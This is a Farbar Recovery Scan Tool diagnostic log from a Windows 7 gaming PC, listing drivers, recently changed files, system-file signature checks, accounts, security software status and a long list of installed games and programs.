R3 CorsairVBusDriver; C:\Windows\System32\DRIVERS\CorsairVBusDriver.sys [47840 2015-05-18] (Corsair)
R3 CorsairVHidDriver; C:\Windows\System32\DRIVERS\CorsairVHidDriver.sys [21728 2015-05-18] (Corsair)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 mio; C:\Windows\System32\DRIVERS\mio.sys [7680 2011-05-04] (Dell/Alienware)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19576 2015-08-26] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [50472 2015-08-10] (NVIDIA Corporation)
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [31656 2015-06-08] ()
S3 TRIDCap; C:\Windows\System32\DRIVERS\AVerTM62_x64.sys [1074048 2012-11-22] (AVerMedia TECHNOLOGIES, Inc. ) [File not signed]
S3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [26200 2014-07-02] (SplitmediaLabs Limited)
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va012; \??\C:\Windows\SysWOW64\Drivers\X6va012 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-10 19:35 - 2015-10-10 19:35 - 00018069 _____ C:\Users\Rainsford\Desktop\FRST.txt
2015-10-10 19:34 - 2015-10-10 19:35 - 00000000 ____D C:\FRST
2015-10-10 19:34 - 2015-10-10 19:34 - 02195456 _____ (Farbar) C:\Users\Rainsford\Desktop\FRST64.exe
2015-10-10 19:30 - 2015-10-10 19:30 - 00000168 _____ C:\Windows\setupact.log
2015-10-10 19:30 - 2015-10-10 19:30 - 00000000 _____ C:\Windows\setuperr.log
2015-10-09 21:48 - 2015-10-09 21:49 - 00000000 ____D C:\Users\Rainsford\Desktop\Notes
2015-10-09 20:29 - 2015-10-09 20:35 - 00009466 _____ C:\Users\Rainsford\Desktop\hijackthis.log
2015-10-09 20:27 - 2015-10-09 20:27 - 00388608 _____ (Trend Micro Inc.) C:\Users\Rainsford\Desktop\HijackThis.exe
2015-10-07 13:29 - 2015-10-08 13:56 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\PixelPiracy
2015-10-01 15:22 - 2015-10-01 15:22 - 00000000 ____D C:\Steam
2015-09-30 22:02 - 2015-09-30 22:28 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-09-24 15:50 - 2015-09-24 15:50 - 00000000 ____D C:\Users\Rainsford\AppData\LocalLow\Tensun
2015-09-24 15:49 - 2015-09-24 15:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2015-09-24 15:49 - 2015-09-24 15:49 - 00000000 ____D C:\Program Files\7-Zip
2015-09-23 13:06 - 2015-09-23 13:06 - 00000000 ____D C:\ArcheAge
2015-09-23 10:41 - 2015-10-09 19:59 - 00000000 ____D C:\Program Files (x86)\Glyph
2015-09-23 10:41 - 2015-09-23 10:41 - 00000997 _____ C:\Users\Rainsford\Desktop\Glyph.lnk
2015-09-23 10:41 - 2015-09-23 10:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glyph
2015-09-17 21:32 - 2015-09-17 21:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Corsair Utility Engine
2015-09-17 21:32 - 2015-09-17 21:32 - 00000000 ____D C:\Program Files (x86)\Corsair

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-10-10 19:34 - 2014-11-10 23:55 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-10-10 19:33 - 2015-03-30 09:22 - 01986947 _____ C:\Windows\WindowsUpdate.log
2015-10-10 19:32 - 2014-06-14 21:40 - 00000924 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA.job
2015-10-10 19:31 - 2013-07-09 21:54 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\Skype
2015-10-10 19:30 - 2015-09-01 16:11 - 00000000 ____D C:\ProgramData\NVIDIA
2015-10-10 19:30 - 2014-11-10 23:55 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-10-10 19:30 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-10-09 22:32 - 2014-06-14 21:40 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core.job
2015-10-09 22:01 - 2015-09-07 01:12 - 00000000 ____D C:\New folder
2015-10-09 21:57 - 2015-09-07 16:54 - 00000080 _____ C:\Users\Rainsford\AppData\Local剜捯獫慴⁲慇敭屳呇⁁屖湥楴汴浥湥⹴湩潦
2015-10-09 21:37 - 2015-07-01 01:04 - 00000000 ____D C:\Program Files (x86)\CABAL2 (US)
2015-10-09 21:19 - 2013-11-10 13:09 - 00000000 ____D C:\Windows\pss
2015-10-09 21:18 - 2013-09-14 21:31 - 00000000 ____D C:\Users\Rainsford\AppData\Local\CrashDumps
2015-10-09 21:04 - 2009-07-13 23:45 - 00021280 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-10-09 21:04 - 2009-07-13 23:45 - 00021280 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-10-09 20:51 - 2015-08-26 18:51 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-10-09 20:28 - 2014-05-20 20:40 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Glyph
2015-10-09 20:21 - 2014-09-12 12:12 - 00000000 ____D C:\Users\Rainsford\Documents\ArcheAge
2015-10-09 02:16 - 2015-01-15 02:54 - 00000000 ____D C:\Fraps Movies
2015-10-02 21:54 - 2015-06-15 23:38 - 00780488 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-10-02 21:54 - 2015-06-15 23:38 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-10-02 21:53 - 2014-09-01 23:01 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Adobe
2015-10-01 17:33 - 2014-11-26 14:14 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Frontier_Developments
2015-10-01 15:30 - 2014-11-26 14:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Frontier
2015-10-01 15:27 - 2014-09-11 19:50 - 00000000 ____D C:\Games
2015-10-01 09:38 - 2013-07-09 21:45 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-09-30 17:04 - 2013-07-10 13:12 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\LolClient
2015-09-29 15:25 - 2014-04-04 20:32 - 00000000 ____D C:\ProgramData\TEMP
2015-09-29 08:30 - 2013-10-23 09:18 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\vlc
2015-09-29 08:25 - 2013-07-22 11:27 - 00000000 ___HD C:\Steamed
2015-09-23 12:40 - 2015-06-29 21:47 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Akamai
2015-09-23 10:41 - 2014-05-20 20:40 - 00000000 ____D C:\ProgramData\Glyph
2015-09-20 21:42 - 2013-07-12 20:14 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\BitTorrent
2015-09-19 09:51 - 2013-07-10 00:23 - 00000000 ____D C:\Users\Rainsford\AppData\Local\Warframe
2015-09-18 23:44 - 2015-08-20 20:01 - 00000000 ____D C:\School
2015-09-16 23:07 - 2015-09-07 17:10 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\NVIDIA
2015-09-16 09:46 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\system32\NDF
2015-09-16 02:29 - 2014-11-10 23:55 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-16 02:29 - 2014-11-10 23:55 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-15 22:27 - 2014-06-14 21:40 - 00003906 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000UA
2015-09-15 22:27 - 2014-06-14 21:40 - 00003510 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-671774419-928818983-1318283798-1000Core
2015-09-15 14:59 - 2013-08-29 17:28 - 00000056 _____ C:\Windows\kgt2k.INI
2015-09-15 14:18 - 2014-12-29 22:38 - 00000000 ____D C:\Users\Rainsford\AppData\Roaming\MMFApplications

==================== Files in the root of some directories =======

2014-08-03 12:34 - 2014-09-11 17:08 - 0007602 _____ () C:\Users\Rainsford\AppData\Local\Resmon.ResmonCfg

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-10-01 12:27

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-10-2015
Ran by Rainsford (2015-10-10 19:36:05)
Running from C:\Users\Rainsford\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-10 02:16:28)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-671774419-928818983-1318283798-500 - Administrator - Disabled)
Guest (S-1-5-21-671774419-928818983-1318283798-501 - Limited - Disabled)
Rainsford (S-1-5-21-671774419-928818983-1318283798-1000 - Administrator - Enabled) => C:\Users\Rainsford

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 15.07 beta (x64) (HKLM\...\7-Zip) (Version: 15.07 - Igor Pavlov)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.2.202.235 - Adobe Systems Incorporated)
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\Akamai) (Version:  - Akamai Technologies, Inc)
Alienware Command Center (HKLM-x32\...\InstallShield_{ACBE8264-9018-49B8-9041-3A74E2596BF3}) (Version: 2.8.9.0 - Alienware Corp.)
Alienware Command Center (Version: 2.8.9.0 - Alienware Corp.) Hidden
Archeage (HKLM-x32\...\Glyph Archeage) (Version:  - Trion Worlds, Inc.)
BitTorrent (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\BitTorrent) (Version: 7.9.4.40912 - BitTorrent Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CABAL2 (US) (HKLM-x32\...\CABAL2US) (Version:  - ESTsoft Corp.)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.03 - Piriform)
Corsair Utility Engine (HKLM-x32\...\{791216E9-E76E-4C76-9C6E-C968A8C253D9}) (Version: 1.10.67 - Corsair)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
Creeper World 3: Arc Eternal (HKLM-x32\...\Steam App 280220) (Version:  - Knuckle Cracker)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)
DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FaceRig (HKLM-x32\...\Steam App 274920) (Version:  - Holotech Studios)
FaceRig Virtual Video driver version 1.0 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0 - Adoriasoft LLC)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Folk Tale (HKLM-x32\...\Steam App 224440) (Version:  - Games Foundry)
Fractured Space (HKLM-x32\...\Steam App 310380) (Version:  - Edge Case Games Ltd.)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
GOG Galaxy (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version:  - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Steam App 271590) (Version:  - Rockstar North)
Hardland (HKLM-x32\...\Steam App 321980) (Version:  - Mountain Sheep)
HOARD (HKLM-x32\...\Steam App 63000) (Version:  - Big Sandwich Games)
HP Deskjet 3050 J610 series Basic Device Software (HKLM\...\{7D220A57-969F-4D09-9297-D48195A8ABDD}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 3050 J610 series Help (HKLM-x32\...\{F7632A9B-661E-4FD9-B1A4-3B86BC99847F}) (Version: 140.0.63.63 - Hewlett Packard)
Java 8 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418045F0}) (Version: 8.0.450 - Oracle Corporation)
Java SE Development Kit 7 Update 25 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170250}) (Version: 1.7.0.250 - Oracle)
Java SE Development Kit 7 Update 40 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170400}) (Version: 1.7.0.400 - Oracle)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead (HKLM-x32\...\Steam App 500) (Version:  - Valve)
LEGO Lord of the Rings (HKLM-x32\...\Steam App 214510) (Version:  - Traveller's Tales)
Lego Star Wars Saga (HKLM-x32\...\Steam App 32440) (Version:  - Traveller's Tales )
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
LOLReplay (HKLM-x32\...\LOLReplay) (Version: 0.8.9.22 - www.leaguereplays.com)
LOOT (HKLM-x32\...\LOOT) (Version: 0.6.0 - LOOT Development Team)
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Media Plugin (HKLM-x32\...\InstallShield_{9A81C9E3-EE6E-435C-9A9A-3749D02D8C4A}) (Version: 1.0.0.16 - Alienware)
Media Plugin (x32 Version: 1.0.0.16 - Alienware) Hidden
METAL GEAR SOLID V: GROUND ZEROES (HKLM-x32\...\Steam App 311340) (Version:  - Kojima Productions)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version:  - Konami Digital Entertainment)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{887868A2-D6DE-3255-AA92-AA0B5A59B874}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 41.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 41.0.1 (x86 en-US)) (Version: 41.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.1.5750 - Mozilla)
My.com Game Center (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\MyComGames) (Version: 3.140 - My.com B.V.)
Nightly 36.0a1 (x64 en-US) (HKLM\...\Nightly 36.0a1 (x64 en-US)) (Version: 36.0a1 - Mozilla)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 355.82 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.14.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.14.5 - NVIDIA Corporation)
NVIDIA Graphics Driver 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 355.82 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.3 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.0.0 (HKLM-x32\...\{55E61709-D7D4-43C0-B45D-BFAF5C09A02D}) (Version: 4.00.9702 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PAC-MAN Championship Edition DX+ (HKLM-x32\...\Steam App 236450) (Version:  - Mine Loader Software Co., Ltd.)
Path of Exile (HKLM-x32\...\Steam App 238960) (Version:  - Grinding Gear Games)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
Pixel Piracy (HKLM-x32\...\Steam App 264140) (Version:  - Vitali Kirpu)
PVZ Garden Warfare (HKLM-x32\...\{A5AC7D7B-C1D5-4AF9-8829-993DA335BE1B}) (Version: 1.0.3.0 - Electronic Arts)
Resident Evil 4 / Biohazard 4 (HKLM-x32\...\Steam App 254700) (Version:  - Capcom)
Resident Evil 5 (HKLM-x32\...\Steam App 21690) (Version:  - Capcom)
Robocraft (HKLM-x32\...\Steam App 301520) (Version:  - Freejam)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.6.5 - Rockstar Games)
Rogue Legacy (HKLM-x32\...\Steam App 241600) (Version:  - Cellar Door Games)
RPG Maker VX RTP (HKLM-x32\...\RPG Maker VX RTP_is1) (Version: 1.02 - Enterbrain)
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
skyforge_mycom (HKU\S-1-5-21-671774419-928818983-1318283798-1000\...\skyforge_mycom) (Version: 1.35 - My.com B.V.)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.103 - Skype Technologies S.A.)
Starpoint Gemini 2 (HKLM-x32\...\Steam App 236150) (Version:  - Little Green Men Games)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.15.1 - TeamSpeak Systems GmbH)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version:  - Bethesda Game Studios)
The Legend of Heroes: Trails in the Sky (HKLM-x32\...\Steam App 251150) (Version:  - Nihon Falcom)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.0.8.3 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Ciri (HKLM-x32\...\Alternative Look for Ciri_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Triss (HKLM-x32\...\Alternative Look for Triss_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Alternative Look for Yennefer (HKLM-x32\...\Alternative Look for Yennefer_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Ballad Heroes - Neutral Gwent Card Set (HKLM-x32\...\Ballad Heroes - Neutral Gwent Card Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Beard and Hairstyle Set (HKLM-x32\...\Beard and Hairstyle Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Elite Crossbow Set (HKLM-x32\...\Elite Crossbow Set_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Finisher Animations (HKLM-x32\...\New Finisher Animations_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - NEW GAME + (HKLM-x32\...\NEW GAME +_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Contract - Skellige's Most Wanted (HKLM-x32\...\New Quest - Contract: Skellige's Most Wanted_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Contract Missing Miners (HKLM-x32\...\New Quest - Contract Missing Miners_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Fool's Gold (HKLM-x32\...\New Quest - Fool's Gold_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Scavenger Hunt - Wolf School Gear (HKLM-x32\...\New Quest - Scavenger Hunt: Wolf School Gear_is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - New Quest - Where the Cat and Wolf Play... (HKLM-x32\...\New Quest - Where the Cat and Wolf Play..._is1) (Version: 1.0.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Nilfgaardian Armor Set (HKLM-x32\...\Nilfgaardian Armor Set_is1) (Version: 1.0.0.0 - GOG.com)
